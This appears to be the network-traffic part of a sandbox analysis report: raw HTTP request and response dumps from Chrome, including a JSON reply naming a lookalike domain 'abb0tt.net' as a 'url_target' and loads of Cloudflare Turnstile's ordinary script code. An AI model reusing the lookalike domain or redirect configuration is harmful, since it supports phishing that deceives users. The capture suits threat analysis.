                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                                      cache-control: no-cache, private
                                                                                                                                                                                                                                      content-type: application/json
                                                                                                                                                                                                                                      x-ratelimit-limit: 60
                                                                                                                                                                                                                                      x-ratelimit-remaining: 58
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: *
                                                                                                                                                                                                                                      access-control-allow-credentials: 1
                                                                                                                                                                                                                                      access-control-allow-headers: X-Requested-With,Content-Type,X-Token-Auth,Authorization
                                                                                                                                                                                                                                      accept: application/json
                                                                                                                                                                                                                                      content-length: 188
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:52:32 GMT
                                                                                                                                                                                                                                      server: LiteSpeed
                                                                                                                                                                                                                                      platform: hostinger
                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      vary: User-Agent
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC188INData Raw: 7b 22 69 64 22 3a 31 35 2c 22 6b 65 79 22 3a 22 74 65 73 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 6f 69 6f 6e 65 31 22 2c 22 75 72 6c 5f 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 62 62 30 74 74 2e 6e 65 74 5c 2f 23 22 2c 22 6f 70 74 69 6f 6e 61 6c 5f 75 72 6c 22 3a 6e 75 6c 6c 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 33 2d 30 36 2d 32 35 54 32 32 3a 34 39 3a 33 32 2e 30 30 30 30 30 30 5a 22 2c 22 75 70 64 61 74 65 64 5f 61 74 22 3a 22 32 30 32 36 2d 31 32 2d 31 30 54 32 32 3a 34 39 3a 33 32 2e 30 30 30 30 30 30 5a 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"id":15,"key":"tes2","username":"Roione1","url_target":"https:\/\/abb0tt.net\/#","optional_url":null,"created_at":"2023-06-25T22:49:32.000000Z","updated_at":"2026-12-10T22:49:32.000000Z"}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.1649736104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC569OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:32 GMT
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                      location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd5caa3ec337-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      12192.168.2.1649737104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC553OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:33 GMT
                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 47521
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd607ece4373-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                      Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                      Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                      Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                      Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                                                                                                                                                      Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                                                                                                                                                      Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                                                      Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                                                                                                                                                      Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                                                                                                                                                      2025-01-07 17:52:33 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                                                                                                                                                      Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      13192.168.2.1649738104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:34 GMT
                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 47521
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd657b3842a3-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                      Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                      Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
